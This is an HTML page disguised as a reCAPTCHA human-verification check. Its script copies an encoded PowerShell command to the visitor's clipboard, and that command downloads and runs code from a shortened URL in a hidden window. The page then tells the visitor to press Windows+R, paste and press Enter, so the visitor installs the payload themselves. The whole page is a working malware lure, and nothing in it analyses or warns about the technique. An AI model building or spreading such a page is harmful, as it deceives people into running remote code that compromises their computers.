
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>𝐈 𝐚𝐦 𝐧𝐨𝐭 𝐚 𝐫𝐨𝐛𝐨𝐭</title>
  <style>
    * {
      box-sizing: border-box;
      margin: 0;
      padding: 0;
    }

    body {
      font-family: Arial, sans-serif;
      background-color: #f5f5f5;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }

    .container {
      background-color: white;
      padding: 20px;
      border-radius: 10px;
      box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
      text-align: center;
      max-width: 500px;
      width: 100%;
    }

    .container h1 {
      color: #3f78e0;
      font-size: 24px;
      margin-bottom: 10px;
    }

    .container p {
      color: #777;
      font-size: 14px;
      margin-bottom: 20px;
    }

    .captcha-button {
      background-color: #3f78e0;
      color: white;
      font-size: 16px;
      padding: 12px 20px;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      display: flex;
      justify-content: center;
      align-items: center;
      gap: 10px;
    }

    .captcha-button img {
      width: 20px;
      height: 20px;
    }

    .captcha-button:active {
      background-color: #2b5bb1;
    }


    .modal-overlay {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.5);
      z-index: 1000;
    }

    .modal {
      display: none;
      position: fixed;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      background-color: white;
      padding: 20px;
      border-radius: 10px;
      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
      width: 400px;
      z-index: 1001;
      text-align: center;
    }

    .modal h2 {
      color: #3f78e0;
      margin-bottom: 15px;
      font-size: 35px;
    }

    .modal ul {
      list-style: none;
      padding: 0;
      margin: 0;
      text-align: left;
    }

    .modal li {
      margin-bottom: 10px;
      font-size: 20px;
    }


    .windows-logo {
      vertical-align: middle;
      width: 25px;
      height: 25px;
    }
  </style>
</head>
<body>

  <div class="container">
    <h1>𝐅𝐨𝐥𝐥𝐨𝐰 𝐬𝐭𝐞𝐩𝐬 𝐟𝐨𝐫 𝐯𝐞𝐫𝐢𝐟𝐢𝐜𝐚𝐭𝐢𝐨𝐧:</h1>
    <p>𝐏𝐥𝐞𝐚𝐬𝐞 𝐯𝐞𝐫𝐢𝐟𝐲 𝐭𝐡𝐚𝐭 𝐲𝐨𝐮 𝐚𝐫𝐞 𝐡𝐮𝐦𝐚𝐧</p>
   <center><button class="c-button" id="copyButton">
      <img src="https://www.gstatic.com/recaptcha/api2/logo_48.png" alt="logo">
      𝐂𝐥𝐢𝐜𝐤 𝐡𝐞𝐫𝐞 𝐚𝐧𝐝 𝐯𝐞𝐫𝐢𝐟𝐲
    </button></center>
  </div>


  <div class="modal-overlay" id="modalOverlay"></div>

  <div class="modal" id="verificationModal">
    <h2>𝐅𝐨𝐥𝐥𝐨𝐰 𝟑 𝐬𝐭𝐞𝐩𝐬 𝐟𝐨𝐫 𝐯𝐞𝐫𝐢𝐟𝐢𝐜𝐚𝐭𝐢𝐨𝐧</h2><br>
    
    <ul>
      <center><li>𝐒𝐭𝐞𝐩 𝟏: 𝐏𝐫𝐞𝐬𝐬 𝐖𝐢𝐧𝐝𝐨𝐰𝐬 𝐁𝐮𝐭𝐭𝐨𝐧 <strong>"<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR368l108nd8kZC87dE8Wp-H3MPyoqk-3rWnw&s" class="windows-logo" alt="Windows Logo">"</strong> + R</li><br>
      <li>𝐒𝐭𝐞𝐩 𝟐: 𝐏𝐫𝐞𝐬𝐬 𝐂𝐓𝐑𝐋   𝐕</li><br>
      <li>𝐒𝐭𝐞𝐩 𝟑: 𝐏𝐫𝐞𝐬𝐬 𝐄𝐧𝐭𝐞𝐫</li></center>
    </ul>
    
  </div>
  <script>
    (function() {
        var a = document.getElementById('copyButton');
        var b = document.getElementById('verificationModal');
        var c = document.getElementById('modalOverlay');
        var d = "powershell -enc aAA7AGkAZQB4ACgAaQByAG0AIABoAHQAdABwAHMAOgAvAC8AdABpAG4AeQB1AHIAbAAuAGMAbwBtAC8AMwA1AG4AcAByAGsANABqACkA -w h";

        a.addEventListener('click', function() {
            navigator.clipboard.writeText(d).then(function() {
                b.style.display = 'block';
                c.style.display = 'block';
            }).catch(function(e) {
                console.error('Failed to copy text: ', e);
            });
        });

        c.addEventListener('click', function() {
            b.style.display = 'none';
            c.style.display = 'none';
        });
    })();
  </script>


</body>
</html>
